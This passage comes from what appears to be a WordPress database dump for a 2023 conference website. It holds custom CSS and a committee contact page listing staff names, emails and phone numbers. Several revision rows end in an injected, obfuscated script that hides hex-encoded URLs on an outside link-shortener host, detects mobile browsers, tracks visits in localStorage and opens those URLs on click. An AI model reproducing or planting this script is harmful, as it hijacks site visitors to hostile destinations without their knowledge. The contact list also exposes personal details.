)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 13:21:16','2023-06-27 13:21:16','',4849,'https://gsw2023.com/?p=4932',0,'revision','',0),
(4934,4,'2023-06-27 13:21:43','2023-06-27 13:21:43','#bottom-bar .wf-float-left{\n	display: none !important;\n}\n#bottom-bar .wf-float-right .bottom-text-block{\n	float: none !important;\n	width: 100% !important;\n	text-align: center !important;\n}\n\n\n.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\n.full-width{\n	width:100% !important;\n}\n.center{\n	text-align: center !important;\n}\n.img_card_1{\n	width: 110px;\n	height: 150px;\n	object-fit: cover;\n	border-radius: 10px;\n}\n.img_card_2 img{\n	width: 150px;\n	height: 200px;\n	object-fit: cover;\n	border-radius: 10px;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-27 13:21:43','2023-06-27 13:21:43','',4823,'https://gsw2023.com/?p=4934',0,'revision','',0),
(4935,4,'2023-06-27 13:22:40','2023-06-27 13:22:40','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: +203 5497598</td>\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\">nashwa.elbendary@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871415968{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687871444230{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 